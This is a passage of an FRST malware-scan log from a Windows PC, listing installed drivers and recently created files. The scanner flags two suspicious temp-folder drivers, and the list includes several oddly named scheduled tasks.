        ===================== Drivers (Whitelisted) ======================

        (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

        S3 ADSPIDEREX; C:\Windows\system32\drivers\adspiderex.sys [55664 2015-12-28] ((주)디지탈온넷)
        S3 AFTrafMgr1.2; C:\Program Files (x86)\Hotspot Shield\bin\TrafMgr_1_2_64.sys [57272 2017-02-16] (AnchorFree Inc.)
        R3 AsusPTPDrv; C:\Windows\System32\drivers\AsusPTPFilter.sys [281592 2016-06-13] (ASUS Corporation)
        R3 athr; C:\Windows\System32\drivers\athw10x.sys [4316456 2016-05-03] (Qualcomm Atheros Communications, Inc.)
        S0 Avgboota; C:\Windows\System32\DRIVERS\avgboota.sys [21632 2016-01-07] (AVG Technologies CZ, s.r.o.)
        R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [163072 2016-05-13] (AVG Technologies CZ, s.r.o.)
        R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313088 2017-02-20] (AVG Technologies CZ, s.r.o.)
        R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [267008 2016-10-05] (AVG Technologies CZ, s.r.o.)
        R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [298240 2016-11-30] (AVG Technologies CZ, s.r.o.)
        R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [360736 2016-02-16] (AVG Technologies CZ, s.r.o.)
        R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [254208 2016-09-26] (AVG Technologies CZ, s.r.o.)
        R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [52992 2016-06-01] (AVG Technologies CZ, s.r.o.)
        R0 avguniva; C:\Windows\System32\DRIVERS\avguniva.sys [77056 2016-06-20] (AVG Technologies CZ, s.r.o.)
        R1 Avgwfpa; C:\Windows\system32\DRIVERS\avgwfpa.sys [313096 2016-08-04] (AVG Technologies CZ, s.r.o.)
        R3 dptf_cpu; C:\Windows\System32\drivers\dptf_cpu.sys [65088 2016-05-23] (Intel Corporation)
        R3 esif_lf; C:\Windows\System32\drivers\esif_lf.sys [343608 2016-05-23] (Intel Corporation)
        S3 GunBod; C:\Windows\system32\gunbod64.sys [84384 2017-02-18] ()
        R3 iaLPSS2_I2C; C:\Windows\System32\drivers\iaLPSS2_I2C.sys [185144 2016-05-16] (Intel Corporation)
        R3 igfx; C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\igdkmd64.sys [11039712 2016-11-30] (Intel Corporation)
        S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
        R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nva mi.inf_amd64_79f909bfbbd7ec05\nvlddmkm.sys [14574640 2017-03-18] (NVIDIA Corporation)
        S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-24] (NVIDIA Corporation)
        R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [46016 2017-01-21] (NVIDIA Corporation)
        R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [59448 2017-03-17] (NVIDIA Corporation)
        R1 p1490101895am; C:\Users\ASUS\AppData\Local\Temp\bk1FB3.tmp\p14901 01895am.sys [746960 2017-03-21] (一普明为(北京)信息技术有限公司) <==== ATTENTION
        R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [937728 2016-06-06] (Realtek )
        S3 rzendpt; C:\Windows\System32\drivers\rzendpt.sys [50392 2015-08-13] (Razer Inc)
        R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
        R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-10-08] (Razer, Inc.)
        R3 taphss6; C:\Windows\System32\drivers\taphss6.sys [42064 2017-03-01] (Anchorfree Inc.)
        S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
        S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
        S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
        R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2017-03-22] (Zemana Ltd.)
        R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-03-22] (Zemana Ltd.)
        S3 dbx; system32\DRIVERS\dbx.sys
        S1 p1490101675am; ??\C:\Users\ASUS\AppData\Local\Temp\bkC5D9.tmp\p14 90101675am.sys <==== ATTENTION

        ==================== NetSvcs (Whitelisted) ===================

        (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

        ==================== One Month Created files and folders ========

        (If an entry is included in the fixlist, the file/folder will be moved.)

        2017-04-01 00:15 - 2017-04-01 00:16 - 00028490 _____ C:\Users\ASUS\Desktop\FRST.txt
        2017-04-01 00:14 - 2017-04-01 00:15 - 02424832 _____ (Farbar) C:\Users\ASUS\Desktop\FRST64.exe
        2017-04-01 00:14 - 2017-04-01 00:15 - 00000000 ____D C:\FRST
        2017-04-01 00:05 - 2017-04-01 00:05 - 00002350 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
        2017-04-01 00:05 - 2017-04-01 00:05 - 00002338 _____ C:\Users\Public\Desktop\Google Chrome.lnk
        2017-03-31 23:05 - 2017-03-31 23:05 - 01129376 _____ (Google Inc.) C:\Users\ASUS\Downloads\ChromeSetup.exe
        2017-03-31 23:05 - 2017-03-31 23:05 - 00003416 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineU A
        2017-03-31 23:05 - 2017-03-31 23:05 - 00003292 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineC ore
        2017-03-31 22:37 - 2017-04-01 00:02 - 01388432 _____ C:\Users\Public\VOIP.dat
        2017-03-31 21:50 - 2017-03-31 21:50 - 00004100 _____ C:\Windows\System32\Tasks\Kinyatiqther
        2017-03-31 21:50 - 2017-03-31 21:50 - 00002626 _____ C:\Windows\System32\Tasks\WinTOOL
        2017-03-31 21:50 - 2017-03-31 21:50 - 00002324 _____ C:\Windows\System32\Tasks\psv_TrisAir
        2017-03-31 21:50 - 2017-03-31 21:50 - 00002320 _____ C:\Windows\System32\Tasks\psv_Opedomtax
        2017-03-31 21:50 - 2017-03-31 21:50 - 00002308 _____ C:\Windows\System32\Tasks\psv_SumCore
        2017-03-31 21:22 - 2017-03-31 21:22 - 00000000 ____D C:\Program Files\Enigma Software Group
        2017-03-31 21:15 - 2017-03-31 21:21 - 04615856 _____ (Enigma Software Group USA, LLC.) C:\Users\ASUS\Downloads\SpyHunter-Installer.exe
        2017-03-31 16:08 - 2017-04-01 00:15 - 00449532 _____ C:\Windows\ZAM.krnl.trace
        2017-03-31 16:08 - 2017-04-01 00:15 - 00149043 _____ C:\Windows\ZAM_Guard.krnl.trace
        2017-03-29 13:26 - 2017-03-29 13:33 - 00000783 _____ C:\Users\ASUS\Desktop\FB.txt
        2017-03-28 22:16 - 2017-03-28 22:16 - 00001927 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
        2017-03-28 18:56 - 2017-03-28 18:56 - 00000000 ____D C:\Program Files (x86)\58DA4F76_jumpeasy
        2017-03-27 07:14 - 2017-03-27 07:14 - 00001676 _____ C:\Users\ASUS\Desktop\opensetup - Shortcut.lnk
        2017-03-27 07:04 - 2017-03-27 07:04 - 00000000 ____D C:\Users\ASUS\Documents\Custom Office Templates
        2017-03-25 08:16 - 2017-03-25 08:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
        2017-03-25 00:45 - 2017-03-30 20:20 - 00000000 ____D C:\Users\ASUS\Desktop\magic string
        2017-03-24 14:58 - 2017-03-24 14:58 - 00000000 _D C:\Program Files (x86)\VulkanRT
        2017-03-24 14:58 - 2017-03-17 06:16 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
        2017-03-24 14:58 - 2017-01-26 07:13 - 00103936 _____ C:\Windows\SysWOW64\vulkaninfo.exe
        2017-03-24 14:58 - 2017-01-26 07:12 - 00326656 _____ C:\Windows\SysWOW64\vulkan-1.dll
        2017-03-24 14:58 - 2017-01-26 07:09 - 00322560 _____ C:\Windows\system32\vulkan-1.dll
        2017-03-24 14:58 - 2017-01-26 07:09 - 00118272 _____ C:\Windows\system32\vulkaninfo.exe
        2017-03-24 14:56 - 2017-03-24 14:57 - 00000000 D C:\Windows\LastGood.Tmp
        2017-03-24 14:52 - 2017-03-17 08:01 - 40190400 _____ C:\Windows\system32\nvcompiler.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 35272760 _____ C:\Windows\SysWOW64\nvcompiler.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 34991672 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 28254264 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 19006832 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 14674896 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 11122728 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 11019888 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 09306312 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 08990256 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 04078008 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 03597456 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 03169848 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 02716096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 01983424 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6437892.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 01589696 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6437892.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 01052096 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00991288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00959424 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00946456 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncMFTH264.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00910784 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00721952 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncMFTH264.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00687408 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00609728 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00576192 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00573632 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00500792 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00447984 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
        2017-03-24 14:52 - 2017-03-17 08:01 - 00059448 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvhci.sys
        2017-03-24 14:52 - 2017-03-17 08:01 - 00043636 _____ C:\Windows\system32\nvinfo.pb
        2017-03-24 14:47 - 2017-03-24 14:47 - 00003994 _____ C:\Windows\System32\Tasks\NvNodeLauncher
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-24 14:47 - 2017-03-24 14:47 - 00001489 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
        2017-03-24 14:46 - 2017-03-24 14:46 - 00004308 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-24 14:46 - 2017-03-24 14:46 - 00003894 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-24 14:46 - 2017-03-24 14:46 - 00003866 _____ C:\Windows\System32\Tasks\NvTmRep
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-24 14:46 - 2017-03-24 14:46 - 00003858 _____ C:\Windows\System32\Tasks\NvTmMon
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-24 14:46 - 2017-03-24 14:46 - 00003696 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-24 14:46 - 2017-03-24 14:46 - 00003654 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon
        {B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
        2017-03-23 09:14 - 2017-03-23 09:14 - 04427776 _____ C:\Users\ASUS\Desktop\Hacks.EXE
        2017-03-22 23:44 - 2017-03-28 22:16 - 00001979 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
        2017-03-22 23:44 - 2017-03-22 23:44 - 00000858 _____ C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Internet Explorer.lnk
        2017-03-22 07:29 - 2017-03-22 07:29 - 00001691 _____ C:\Users\ASUS\Desktop\chrome - Shortcut.lnk
        2017-03-22 07:23 - 2017-03-22 07:23 - 00000104 _____ C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Google Chrome.lnk
        2017-03-22 07:07 - 2017-03-22 07:07 - 00203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zamguard64.sys
        2017-03-22 07:07 - 2017-03-22 07:07 - 00203680 _____ (Zemana Ltd.) C:\Windows\system32\Drivers\zam64.sys
        2017-03-22 07:07 - 2017-03-22 07:07 - 00000910 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
        2017-03-22 07:07 - 2017-03-22 07:07 - 00000000 ____D C:\Users\ASUS\AppData\Local\Zemana
        2017-03-22 07:07 - 2017-03-22 07:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
        2017-03-22 06:19 - 2017-03-31 22:31 - 00000000 ____D C:\Windows\Minidump
        2017-03-21 23:31 - 2017-03-21 23:31 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Bandicam Company
        2017-03-21 23:30 - 2017-03-21 23:30 - 00000896 _____ C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\bdcam.lnk
        2017-03-21 23:29 - 2017-03-21 23:29 - 00000000 ____D C:\Program Files (x86)\BandiMPEG1
        2017-03-20 21:12 - 2017-03-20 21:12 - 00000000 ____D C:\Windows\system32\appmgmt
        2017-03-20 10:09 - 2017-03-20 10:09 - 00000783 _____ C:\Users\Public\Desktop\BattlePing.lnk
        2017-03-20 10:09 - 2017-03-20 10:09 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\NetworkTunnel
        2017-03-20 10:09 - 2017-03-20 10:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BattlePing
        2017-03-18 10:51 - 2016-10-16 12:49 - 00448296 _____ (Network Tunnel Lab) C:\Windows\SysWOW64\networkdlllsp.dll
        2017-03-16 09:28 - 2017-03-10 12:17 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
        2017-03-16 09:28 - 2017-03-10 12:17 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
        2017-03-15 09:43 - 2017-03-04 13:54 - 02277288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
        2017-03-15 09:43 - 2017-03-04 13:53 - 05722320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
        2017-03-15 09:43 - 2017-03-04 13:53 - 01431232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store .dll
        2017-03-15 09:43 - 2017-03-04 13:53 - 00781152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
        2017-03-15 09:43 - 2017-03-04 13:51 - 01980768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
        2017-03-15 09:43 - 2017-03-04 13:47 - 20969928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
        2017-03-15 09:43 - 2017-03-04 13:47 - 06667528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayR eady.dll
        2017-03-15 09:43 - 2017-03-04 13:47 - 04023000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
        2017-03-15 09:43 - 2017-03-04 13:47 - 01344448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsrcsnk.dll
        2017-03-15 09:43 - 2017-03-04 13:47 - 01277856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfasfsrcsnk.dll
        2017-03-15 09:43 - 2017-03-04 13:47 - 01202384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
        2017-03-15 09:43 - 2017-03-04 13:46 - 04312248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
        2017-03-15 09:43 - 2017-03-04 13:42 - 01260784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
        2017-03-15 09:43 - 2017-03-04 13:36 - 05685760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
        2017-03-15 09:43 - 2017-03-04 13:22 - 00231424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudBackupSettings.dll
        2017-03-15 09:43 - 2017-03-04 13:20 - 13873664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
        2017-03-15 09:43 - 2017-03-04 13:18 - 00819200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppContracts.dll
        2017-03-15 09:43 - 2017-03-04 13:13 - 07626752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
        2017-03-15 09:43 - 2017-03-04 13:11 - 01323008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_fs.dll
        2017-03-15 09:43 - 2017-03-04 13:11 - 01137152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_health.dll
        2017-03-15 09:43 - 2017-03-04 13:10 - 03307008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
        2017-03-15 09:43 - 2017-03-04 13:07 - 02748928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
        2017-03-15 09:43 - 2017-03-04 13:07 - 02643456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
        2017-03-15 09:43 - 2017-03-04 13:06 - 06109184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mos.dll
        2017-03-15 09:43 - 2017-03-04 13:06 - 05380608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingMaps.dll
        2017-03-15 09:43 - 2017-03-04 13:06 - 02153984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
        2017-03-15 09:43 - 2017-03-04 13:03 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapRouter.dll
        2017-03-15 09:43 - 2017-03-04 13:03 - 02109952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapGeocoder.dll
        2017-03-15 09:43 - 2017-03-04 13:02 - 04423680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
        2017-03-15 09:43 - 2017-03-04 13:01 - 02646528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
        2017-03-15 09:43 - 2017-03-04 13:01 - 01993216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
        2017-03-15 09:43 - 2017-03-04 13:01 - 01988096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
        2017-03-15 09:43 - 2017-03-04 13:01 - 01595904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
        2017-03-15 09:43 - 2017-03-04 13:01 - 01556992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Immersive.dll
        2017-03-15 09:43 - 2017-03-04 13:00 - 04557824 _____ (Microsoft) C:\Windows\SysWOW64\dbgeng.dll
        2017-03-15 09:43 - 2017-03-04 13:00 - 02483200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
        2017-03-15 09:43 - 2017-03-04 13:00 - 02003968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
        2017-03-15 09:42 - 2017-03-04 14:57 - 00484584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
        2017-03-15 09:42 - 2017-03-04 14:57 - 00315744 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
        2017-03-15 09:42 - 2017-03-04 14:44 - 01470816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
        2017-03-15 09:42 - 2017-03-04 14:40 - 00965472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll
        2017-03-15 09:42 - 2017-03-04 14:24 - 00090976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\IPMIDrv.sys
        2017-03-15 09:42 - 2017-03-04 14:09 - 02206496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
        2017-03-15 09:42 - 2017-03-04 14:09 - 01969912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hevcdecoder.dll
        2017-03-15 09:42 - 2017-03-04 14:09 - 00497416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
        2017-03-15 09:42 - 2017-03-04 14:08 - 00130912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storahci.sys
        2017-03-15 09:42 - 2017-03-04 14:07 - 00557400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
        2017-03-15 09:42 - 2017-03-04 14:04 - 02048496 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
        2017-03-15 09:42 - 2017-03-04 14:02 - 00184416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IPHLPAPI.DLL
        2017-03-15 09:42 - 2017-03-04 13:56 - 00263472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.ApplicationDat a.dll
        2017-03-15 09:42 - 2017-03-04 13:56 - 00248992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
        2017-03-15 09:42 - 2017-03-04 13:54 - 00524776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
        2017-03-15 09:42 - 2017-03-04 13:53 - 02256080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
        2017-03-15 09:42 - 2017-03-04 13:53 - 00975744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinapi.appcore.dll
        2017-03-15 09:42 - 2017-03-04 13:53 - 00861024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicenseManager.dll
        2017-03-15 09:42 - 2017-03-04 13:53 - 00493912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
        2017-03-15 09:42 - 2017-03-04 13:53 - 00313568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
        2017-03-15 09:42 - 2017-03-04 13:53 - 00136032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CloudExperienceHostUser.dll
        2017-03-15 09:42 - 2017-03-04 13:52 - 00549088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
        2017-03-15 09:42 - 2017-03-04 13:52 - 00272720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
        2017-03-15 09:42 - 2017-03-04 13:51 - 00576408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
        2017-03-15 09:42 - 2017-03-04 13:50 - 00846560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 01853224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 01557808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winmde.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 01360456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 01123912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00981376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00976184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00952416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00640976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00530480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00374448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFPlay.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00352760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MMDevAPI.dll
        2017-03-15 09:42 - 2017-03-04 13:47 - 00034088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CompPkgSup.dll
        2017-03-15 09:42 - 2017-03-04 13:46 - 00321792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LockAppHost.exe
        2017-03-15 09:42 - 2017-03-04 13:45 - 00173408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\basecsp.dll
        2017-03-15 09:42 - 2017-03-04 13:45 - 00112120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
        2017-03-15 09:42 - 2017-03-04 13:42 - 01415240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll
        2017-03-15 09:42 - 2017-03-04 13:42 - 00545944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
        2017-03-15 09:42 - 2017-03-04 13:42 - 00276832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll
        2017-03-15 09:42 - 2017-03-04 13:40 - 00306800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
        2017-03-15 09:42 - 2017-03-04 13:34 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xboxgip.sys
        2017-03-15 09:42 - 2017-03-04 13:30 - 01631232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.Resources.dll
        2017-03-15 09:42 - 2017-03-04 13:30 - 00095232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
        2017-03-15 09:42 - 2017-03-04 13:30 - 00051712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usoapi.dll
        2017-03-15 09:42 - 2017-03-04 13:30 - 00034304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LaunchWinApp.exe
        2017-03-15 09:42 - 2017-03-04 13:30 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\odbcconf.dll
        2017-03-15 09:42 - 2017-03-04 13:29 - 00112640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
        2017-03-15 09:42 - 2017-03-04 13:29 - 00091648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctfp.dll
        2017-03-15 09:42 - 2017-03-04 13:29 - 00039424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XInputUap.dll
        2017-03-15 09:42 - 2017-03-04 13:29 - 00019968 _____ C:\Windows\SysWOW64\GamePanelExternalHook.dll
        2017-03-15 09:42 - 2017-03-04 13:28 - 00224256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
        2017-03-15 09:42 - 2017-03-04 13:27 - 00275968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\accountaccessor.dll
